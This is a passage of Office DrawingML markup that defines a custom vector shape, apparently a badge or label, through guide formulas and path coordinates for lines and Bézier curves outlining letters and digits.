                    <a:gd name="connsiteX146" fmla="*/ 643795 w 1114425"/>
                    <a:gd name="connsiteY146" fmla="*/ 713994 h 1514475"/>
                    <a:gd name="connsiteX147" fmla="*/ 643795 w 1114425"/>
                    <a:gd name="connsiteY147" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX148" fmla="*/ 717328 w 1114425"/>
                    <a:gd name="connsiteY148" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX149" fmla="*/ 717328 w 1114425"/>
                    <a:gd name="connsiteY149" fmla="*/ 610457 h 1514475"/>
                    <a:gd name="connsiteX150" fmla="*/ 661702 w 1114425"/>
                    <a:gd name="connsiteY150" fmla="*/ 610457 h 1514475"/>
                    <a:gd name="connsiteX151" fmla="*/ 661702 w 1114425"/>
                    <a:gd name="connsiteY151" fmla="*/ 642461 h 1514475"/>
                    <a:gd name="connsiteX152" fmla="*/ 713137 w 1114425"/>
                    <a:gd name="connsiteY152" fmla="*/ 642461 h 1514475"/>
                    <a:gd name="connsiteX153" fmla="*/ 880586 w 1114425"/>
                    <a:gd name="connsiteY153" fmla="*/ 699516 h 1514475"/>
                    <a:gd name="connsiteX154" fmla="*/ 906590 w 1114425"/>
                    <a:gd name="connsiteY154" fmla="*/ 667512 h 1514475"/>
                    <a:gd name="connsiteX155" fmla="*/ 924020 w 1114425"/>
                    <a:gd name="connsiteY155" fmla="*/ 667512 h 1514475"/>
                    <a:gd name="connsiteX156" fmla="*/ 880491 w 1114425"/>
                    <a:gd name="connsiteY156" fmla="*/ 716947 h 1514475"/>
                    <a:gd name="connsiteX157" fmla="*/ 831533 w 1114425"/>
                    <a:gd name="connsiteY157" fmla="*/ 653034 h 1514475"/>
                    <a:gd name="connsiteX158" fmla="*/ 880491 w 1114425"/>
                    <a:gd name="connsiteY158" fmla="*/ 589121 h 1514475"/>
                    <a:gd name="connsiteX159" fmla="*/ 923830 w 1114425"/>
                    <a:gd name="connsiteY159" fmla="*/ 630841 h 1514475"/>
                    <a:gd name="connsiteX160" fmla="*/ 905923 w 1114425"/>
                    <a:gd name="connsiteY160" fmla="*/ 630841 h 1514475"/>
                    <a:gd name="connsiteX161" fmla="*/ 880491 w 1114425"/>
                    <a:gd name="connsiteY161" fmla="*/ 606552 h 1514475"/>
                    <a:gd name="connsiteX162" fmla="*/ 849440 w 1114425"/>
                    <a:gd name="connsiteY162" fmla="*/ 653034 h 1514475"/>
                    <a:gd name="connsiteX163" fmla="*/ 880586 w 1114425"/>
                    <a:gd name="connsiteY163" fmla="*/ 699516 h 1514475"/>
                    <a:gd name="connsiteX164" fmla="*/ 845820 w 1114425"/>
                    <a:gd name="connsiteY164" fmla="*/ 742093 h 1514475"/>
                    <a:gd name="connsiteX165" fmla="*/ 889254 w 1114425"/>
                    <a:gd name="connsiteY165" fmla="*/ 785336 h 1514475"/>
                    <a:gd name="connsiteX166" fmla="*/ 869442 w 1114425"/>
                    <a:gd name="connsiteY166" fmla="*/ 785336 h 1514475"/>
                    <a:gd name="connsiteX167" fmla="*/ 844963 w 1114425"/>
                    <a:gd name="connsiteY167" fmla="*/ 761429 h 1514475"/>
                    <a:gd name="connsiteX168" fmla="*/ 824198 w 1114425"/>
                    <a:gd name="connsiteY168" fmla="*/ 779050 h 1514475"/>
                    <a:gd name="connsiteX169" fmla="*/ 837724 w 1114425"/>
                    <a:gd name="connsiteY169" fmla="*/ 796481 h 1514475"/>
                    <a:gd name="connsiteX170" fmla="*/ 870395 w 1114425"/>
                    <a:gd name="connsiteY170" fmla="*/ 806958 h 1514475"/>
                    <a:gd name="connsiteX171" fmla="*/ 892493 w 1114425"/>
                    <a:gd name="connsiteY171" fmla="*/ 841438 h 1514475"/>
                    <a:gd name="connsiteX172" fmla="*/ 847439 w 1114425"/>
                    <a:gd name="connsiteY172" fmla="*/ 883920 h 1514475"/>
                    <a:gd name="connsiteX173" fmla="*/ 800195 w 1114425"/>
                    <a:gd name="connsiteY173" fmla="*/ 835533 h 1514475"/>
                    <a:gd name="connsiteX174" fmla="*/ 820007 w 1114425"/>
                    <a:gd name="connsiteY174" fmla="*/ 835533 h 1514475"/>
                    <a:gd name="connsiteX175" fmla="*/ 848773 w 1114425"/>
                    <a:gd name="connsiteY175" fmla="*/ 864584 h 1514475"/>
                    <a:gd name="connsiteX176" fmla="*/ 872776 w 1114425"/>
                    <a:gd name="connsiteY176" fmla="*/ 844106 h 1514475"/>
                    <a:gd name="connsiteX177" fmla="*/ 863441 w 1114425"/>
                    <a:gd name="connsiteY177" fmla="*/ 827437 h 1514475"/>
                    <a:gd name="connsiteX178" fmla="*/ 829628 w 1114425"/>
                    <a:gd name="connsiteY178" fmla="*/ 816197 h 1514475"/>
                    <a:gd name="connsiteX179" fmla="*/ 804577 w 1114425"/>
                    <a:gd name="connsiteY179" fmla="*/ 781812 h 1514475"/>
                    <a:gd name="connsiteX180" fmla="*/ 845820 w 1114425"/>
                    <a:gd name="connsiteY180" fmla="*/ 742093 h 1514475"/>
                    <a:gd name="connsiteX181" fmla="*/ 816007 w 1114425"/>
                    <a:gd name="connsiteY181" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX182" fmla="*/ 797147 w 1114425"/>
                    <a:gd name="connsiteY182" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX183" fmla="*/ 750665 w 1114425"/>
                    <a:gd name="connsiteY183" fmla="*/ 624364 h 1514475"/>
                    <a:gd name="connsiteX184" fmla="*/ 750284 w 1114425"/>
                    <a:gd name="connsiteY184" fmla="*/ 624364 h 1514475"/>
                    <a:gd name="connsiteX185" fmla="*/ 750284 w 1114425"/>
                    <a:gd name="connsiteY185" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX186" fmla="*/ 733235 w 1114425"/>
                    <a:gd name="connsiteY186" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX187" fmla="*/ 733235 w 1114425"/>
                    <a:gd name="connsiteY187" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX188" fmla="*/ 752094 w 1114425"/>
                    <a:gd name="connsiteY188" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX189" fmla="*/ 798767 w 1114425"/>
                    <a:gd name="connsiteY189" fmla="*/ 681895 h 1514475"/>
                    <a:gd name="connsiteX190" fmla="*/ 799052 w 1114425"/>
                    <a:gd name="connsiteY190" fmla="*/ 681895 h 1514475"/>
                    <a:gd name="connsiteX191" fmla="*/ 799052 w 1114425"/>
                    <a:gd name="connsiteY191" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX192" fmla="*/ 816102 w 1114425"/>
                    <a:gd name="connsiteY192" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX193" fmla="*/ 816102 w 1114425"/>
                    <a:gd name="connsiteY193" fmla="*/ 714089 h 1514475"/>
                    <a:gd name="connsiteX194" fmla="*/ 739331 w 1114425"/>
                    <a:gd name="connsiteY194" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX195" fmla="*/ 789337 w 1114425"/>
                    <a:gd name="connsiteY195" fmla="*/ 813054 h 1514475"/>
                    <a:gd name="connsiteX196" fmla="*/ 739331 w 1114425"/>
                    <a:gd name="connsiteY196" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX197" fmla="*/ 692372 w 1114425"/>
                    <a:gd name="connsiteY197" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX198" fmla="*/ 692372 w 1114425"/>
                    <a:gd name="connsiteY198" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX199" fmla="*/ 739331 w 1114425"/>
                    <a:gd name="connsiteY199" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX200" fmla="*/ 672275 w 1114425"/>
                    <a:gd name="connsiteY200" fmla="*/ 782003 h 1514475"/>
                    <a:gd name="connsiteX201" fmla="*/ 653510 w 1114425"/>
                    <a:gd name="connsiteY201" fmla="*/ 816197 h 1514475"/>
                    <a:gd name="connsiteX202" fmla="*/ 653510 w 1114425"/>
                    <a:gd name="connsiteY202" fmla="*/ 816578 h 1514475"/>
                    <a:gd name="connsiteX203" fmla="*/ 670370 w 1114425"/>
                    <a:gd name="connsiteY203" fmla="*/ 845249 h 1514475"/>
                    <a:gd name="connsiteX204" fmla="*/ 676561 w 1114425"/>
                    <a:gd name="connsiteY204" fmla="*/ 880872 h 1514475"/>
                    <a:gd name="connsiteX205" fmla="*/ 655320 w 1114425"/>
                    <a:gd name="connsiteY205" fmla="*/ 880872 h 1514475"/>
                    <a:gd name="connsiteX206" fmla="*/ 652272 w 1114425"/>
                    <a:gd name="connsiteY206" fmla="*/ 860965 h 1514475"/>
                    <a:gd name="connsiteX207" fmla="*/ 629698 w 1114425"/>
                    <a:gd name="connsiteY207" fmla="*/ 825151 h 1514475"/>
                    <a:gd name="connsiteX208" fmla="*/ 600456 w 1114425"/>
                    <a:gd name="connsiteY208" fmla="*/ 825151 h 1514475"/>
                    <a:gd name="connsiteX209" fmla="*/ 600456 w 1114425"/>
                    <a:gd name="connsiteY209" fmla="*/ 880967 h 1514475"/>
                    <a:gd name="connsiteX210" fmla="*/ 580644 w 1114425"/>
                    <a:gd name="connsiteY210" fmla="*/ 880967 h 1514475"/>
                    <a:gd name="connsiteX211" fmla="*/ 580644 w 1114425"/>
                    <a:gd name="connsiteY211" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX212" fmla="*/ 634746 w 1114425"/>
                    <a:gd name="connsiteY212" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX213" fmla="*/ 672275 w 1114425"/>
                    <a:gd name="connsiteY213" fmla="*/ 782003 h 1514475"/>
                    <a:gd name="connsiteX214" fmla="*/ 322136 w 1114425"/>
                    <a:gd name="connsiteY214" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX215" fmla="*/ 300895 w 1114425"/>
                    <a:gd name="connsiteY215" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX216" fmla="*/ 290227 w 1114425"/>
                    <a:gd name="connsiteY216" fmla="*/ 844963 h 1514475"/>
                    <a:gd name="connsiteX217" fmla="*/ 244983 w 1114425"/>
                    <a:gd name="connsiteY217" fmla="*/ 844963 h 1514475"/>
                    <a:gd name="connsiteX218" fmla="*/ 234315 w 1114425"/>
                    <a:gd name="connsiteY218" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX219" fmla="*/ 213836 w 1114425"/>
                    <a:gd name="connsiteY219" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX220" fmla="*/ 257366 w 1114425"/>
                    <a:gd name="connsiteY220" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX221" fmla="*/ 278511 w 1114425"/>
                    <a:gd name="connsiteY221" fmla="*/ 745331 h 1514475"/>
                    <a:gd name="connsiteX222" fmla="*/ 322136 w 1114425"/>
                    <a:gd name="connsiteY222" fmla="*/ 880777 h 1514475"/>
                    <a:gd name="connsiteX223" fmla="*/ 1009840 w 1114425"/>
                    <a:gd name="connsiteY223" fmla="*/ 642366 h 1514475"/>
                    <a:gd name="connsiteX224" fmla="*/ 1009840 w 1114425"/>
                    <a:gd name="connsiteY224" fmla="*/ 659797 h 1514475"/>
                    <a:gd name="connsiteX225" fmla="*/ 958310 w 1114425"/>
                    <a:gd name="connsiteY225" fmla="*/ 659797 h 1514475"/>
                    <a:gd name="connsiteX226" fmla="*/ 958310 w 1114425"/>
                    <a:gd name="connsiteY226" fmla="*/ 695515 h 1514475"/>
                    <a:gd name="connsiteX227" fmla="*/ 1014984 w 1114425"/>
                    <a:gd name="connsiteY227" fmla="*/ 695515 h 1514475"/>
                    <a:gd name="connsiteX228" fmla="*/ 1014984 w 1114425"/>
                    <a:gd name="connsiteY228" fmla="*/ 713994 h 1514475"/>
                    <a:gd name="connsiteX229" fmla="*/ 940499 w 1114425"/>
                    <a:gd name="connsiteY229" fmla="*/ 713994 h 1514475"/>
                    <a:gd name="connsiteX230" fmla="*/ 940499 w 1114425"/>
                    <a:gd name="connsiteY230" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX231" fmla="*/ 1014032 w 1114425"/>
                    <a:gd name="connsiteY231" fmla="*/ 591979 h 1514475"/>
                    <a:gd name="connsiteX232" fmla="*/ 1014032 w 1114425"/>
                    <a:gd name="connsiteY232" fmla="*/ 610457 h 1514475"/>
                    <a:gd name="connsiteX233" fmla="*/ 958406 w 1114425"/>
                    <a:gd name="connsiteY233" fmla="*/ 610457 h 1514475"/>
                    <a:gd name="connsiteX234" fmla="*/ 958406 w 1114425"/>
                    <a:gd name="connsiteY234" fmla="*/ 642461 h 1514475"/>
                    <a:gd name="connsiteX235" fmla="*/ 1009840 w 1114425"/>
                    <a:gd name="connsiteY235" fmla="*/ 642461 h 1514475"/>
                    <a:gd name="connsiteX236" fmla="*/ 1107377 w 1114425"/>
                    <a:gd name="connsiteY236" fmla="*/ 537020 h 1514475"/>
                    <a:gd name="connsiteX237" fmla="*/ 10954 w 1114425"/>
                    <a:gd name="connsiteY237" fmla="*/ 537020 h 1514475"/>
                    <a:gd name="connsiteX238" fmla="*/ 10954 w 1114425"/>
                    <a:gd name="connsiteY238" fmla="*/ 10954 h 1514475"/>
                    <a:gd name="connsiteX239" fmla="*/ 1107377 w 1114425"/>
                    <a:gd name="connsiteY239" fmla="*/ 10954 h 1514475"/>
                    <a:gd name="connsiteX240" fmla="*/ 1107377 w 1114425"/>
                    <a:gd name="connsiteY240" fmla="*/ 537020 h 1514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</a:cxnLst>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="1114425" h="1514475">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1406081"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="438626" y="1503998"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="478060" y="1512761"/>
                        <a:pt x="518541" y="1517142"/>
                        <a:pt x="559118" y="1517142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="599694" y="1517142"/>
                        <a:pt x="640175" y="1512761"/>
                        <a:pt x="679609" y="1503998"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1118235" y="1406081"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1118235" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="476250" y="1400461"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="476250" y="1414558"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410147" y="1414558"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="410242" y="1398651"/>
                        <a:pt x="418433" y="1386650"/>
                        <a:pt x="431483" y="1377887"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="444056" y="1368743"/>
                        <a:pt x="460439" y="1361123"/>
                        <a:pt x="460629" y="1346073"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="460724" y="1339120"/>
                        <a:pt x="457867" y="1328928"/>
                        <a:pt x="444341" y="1328928"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="431864" y="1328928"/>
                        <a:pt x="428149" y="1339596"/>
                        <a:pt x="427768" y="1353122"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="411956" y="1353122"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="411956" y="1331690"/>
                        <a:pt x="423672" y="1315784"/>
                        <a:pt x="445294" y="1315784"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="468916" y="1315784"/>
                        <a:pt x="476441" y="1333119"/>
                        <a:pt x="476441" y="1345502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="476441" y="1360837"/>
                        <a:pt x="465963" y="1370362"/>
                        <a:pt x="454819" y="1378172"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="443579" y="1385888"/>
                        <a:pt x="431864" y="1391888"/>
                        <a:pt x="429101" y="1400461"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="476250" y="1400461"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="520160" y="1416558"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="492347" y="1416558"/>
                        <a:pt x="486632" y="1388174"/>
                        <a:pt x="486632" y="1366171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="486632" y="1344168"/>
                        <a:pt x="492347" y="1315784"/>
                        <a:pt x="520160" y="1315784"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="547973" y="1315784"/>
                        <a:pt x="553688" y="1344168"/>
                        <a:pt x="553688" y="1366171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="553593" y="1388174"/>
                        <a:pt x="547973" y="1416558"/>
                        <a:pt x="520160" y="1416558"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="607028" y="1414558"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="589693" y="1414558"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="589693" y="1346168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="565880" y="1346168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="565880" y="1333691"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="579120" y="1333786"/>
                        <a:pt x="591788" y="1329309"/>
                        <a:pt x="594074" y="1317593"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="606933" y="1317593"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="606933" y="1414558"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="673989" y="1416558"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="654368" y="1416558"/>
                        <a:pt x="639794" y="1405033"/>
                        <a:pt x="639794" y="1386078"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="639794" y="1373886"/>
                        <a:pt x="646748" y="1365218"/>
                        <a:pt x="657511" y="1362456"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="657511" y="1362170"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="648748" y="1358837"/>
                        <a:pt x="643795" y="1351693"/>
                        <a:pt x="643795" y="1342263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="643795" y="1325785"/>
                        <a:pt x="654749" y="1315879"/>
                        <a:pt x="673989" y="1315879"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="693230" y="1315879"/>
                        <a:pt x="704183" y="1325880"/>
                        <a:pt x="704183" y="1342263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="704183" y="1351693"/>
                        <a:pt x="699230" y="1358837"/>
                        <a:pt x="690467" y="1362170"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="690467" y="1362456"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="701231" y="1365218"/>
                        <a:pt x="708184" y="1373981"/>
                        <a:pt x="708184" y="1386078"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="708184" y="1405033"/>
                        <a:pt x="693611" y="1416558"/>
                        <a:pt x="673989" y="1416558"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1107377" y="1256633"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10954" y="1256633"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10954" y="980789"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1107377" y="980789"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1107377" y="1256633"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="172688" y="642366"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="172688" y="659797"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121158" y="659797"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121158" y="695515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="177832" y="695515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="177832" y="713994"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="103346" y="713994"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="103346" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="176879" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="176879" y="610457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121253" y="610457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121253" y="642461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="172688" y="642461"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="184594" y="591979"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="205931" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="229076" y="635032"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="253270" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="273272" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="239554" y="650843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="275749" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="254032" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="228600" y="667417"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="202692" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="182213" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="218408" y="650843"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184594" y="591979"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="329660" y="699516"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="345567" y="699516"/>
                        <a:pt x="354235" y="685324"/>
                        <a:pt x="355664" y="667512"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="373094" y="667512"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="371666" y="696754"/>
                        <a:pt x="354330" y="716947"/>
                        <a:pt x="329565" y="716947"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="298990" y="716947"/>
                        <a:pt x="280607" y="687896"/>
                        <a:pt x="280607" y="653034"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="280607" y="618173"/>
                        <a:pt x="298895" y="589121"/>
                        <a:pt x="329565" y="589121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="352616" y="589312"/>
                        <a:pt x="370713" y="604552"/>
                        <a:pt x="372904" y="630841"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="354997" y="630841"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="351949" y="616839"/>
                        <a:pt x="344424" y="606552"/>
                        <a:pt x="329565" y="606552"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="307658" y="606552"/>
                        <a:pt x="298514" y="629603"/>
                        <a:pt x="298514" y="653034"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="298609" y="676465"/>
                        <a:pt x="307753" y="699516"/>
                        <a:pt x="329660" y="699516"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="458819" y="642366"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="458819" y="659797"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="407289" y="659797"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="407289" y="695515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463963" y="695515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463963" y="713994"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389477" y="713994"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389477" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463010" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463010" y="610457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="407384" y="610457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="407384" y="642461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="458819" y="642461"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="401955" y="745331"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="424148" y="848868"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="424434" y="848868"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="445580" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="465773" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="434531" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414338" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="391668" y="777240"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="391382" y="777240"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368237" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347663" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="317849" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="338042" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="358521" y="848868"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="358807" y="848868"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="381667" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="401955" y="745331"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="549307" y="695611"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="549307" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="479489" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="479489" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="497396" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="497396" y="695611"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="549307" y="695611"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="505111" y="745331"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="526256" y="745331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="569881" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="548640" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="537972" y="844963"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="492728" y="844963"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="482060" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="461582" y="880777"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="505111" y="745331"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="631412" y="695611"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="631412" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="561594" y="714089"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="561594" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="579501" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="579501" y="695611"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="631412" y="695611"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="713137" y="642366"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="713137" y="659797"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661607" y="659797"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661607" y="695515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="718280" y="695515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="718280" y="713994"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="643795" y="713994"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="643795" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="717328" y="591979"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="717328" y="610457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661702" y="610457"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661702" y="642461"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713137" y="642461"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
